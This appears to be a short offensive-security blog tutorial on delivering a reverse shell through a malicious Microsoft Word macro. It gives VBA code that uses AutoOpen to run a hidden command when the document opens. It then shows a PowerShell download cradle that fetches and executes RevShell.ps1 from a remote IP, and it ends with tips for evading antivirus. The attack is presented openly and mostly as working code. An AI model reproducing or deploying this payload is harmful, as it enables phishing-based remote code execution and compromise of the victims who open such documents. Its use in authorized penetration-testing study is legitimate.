Microsoft Word Macro Payload

Deliver your reverse shell via Microsoft office macros

1 min · Jobyer Ahmed

Table of Contents

Get your code ready
Execute
Simple Downloader
Tips to bypass AV

Delivering reverse shell payload via the office macro is old but still works if you can bypass AV.

Get your code ready

Start Microsoft Office 2016 Pro Plus and Go View Tab and Click Macros>View Macros

Give a macro name, Select Macros in Document1 and Click Create

Paste the below code and save as Word Macro-Enabled Document or Word 97-2003 Document

Sub TestMacro()
'
' TestMacro Macro
'
'
cmd = "calc.exe"
exec = Shell(cmd, vbHide)

End Sub

Sub AutoOpen()
    TestMacro
End Sub

Execute

Open the document and click Enable Content and we will have calc.exe opened!

Simple Downloader

In this way we can execute any command, such as powershell iwr …:

Sub TestMacro()
'
' TestMacro Macro
'
'
cmd = "powershell.exe -exec bypass -c iex(new-object net.webclient).downloadstring('http://10.10.14.15/RevShell.ps1')"
exec = Shell(cmd, vbHide)

End Sub

Sub AutoOpen()
    TestMacro
End Sub

Tips to bypass AV

Encode/Encrypt the powershell command
Unhook Powershell.exe